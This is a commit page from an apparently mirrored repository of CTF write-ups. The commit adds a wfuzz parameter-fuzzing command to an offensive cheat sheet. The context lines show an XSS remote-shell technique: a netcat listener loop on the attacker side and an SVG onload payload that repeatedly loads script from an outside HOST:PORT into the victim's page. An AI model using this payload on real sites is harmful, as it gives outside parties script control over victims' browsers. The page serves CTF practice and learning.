mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
565dfd3a3e
commit
58c95f9c6e
1 changed files with 4 additions and 0 deletions
|
@ -190,6 +190,10 @@ Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; do
|
||||||
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
|
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Wfuzz
|
||||||
|
|
||||||
|
`wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ`
|
||||||
|
|
||||||
### API (Applicaton Programmable Interface)
|
### API (Applicaton Programmable Interface)
|
||||||
|
|
||||||
* Check for possibility if there is a v1 , it is likely to be vulnerable to LFI
|
* Check for possibility if there is a v1 , it is likely to be vulnerable to LFI
|
||||||
|
|
Loading…
Reference in a new issue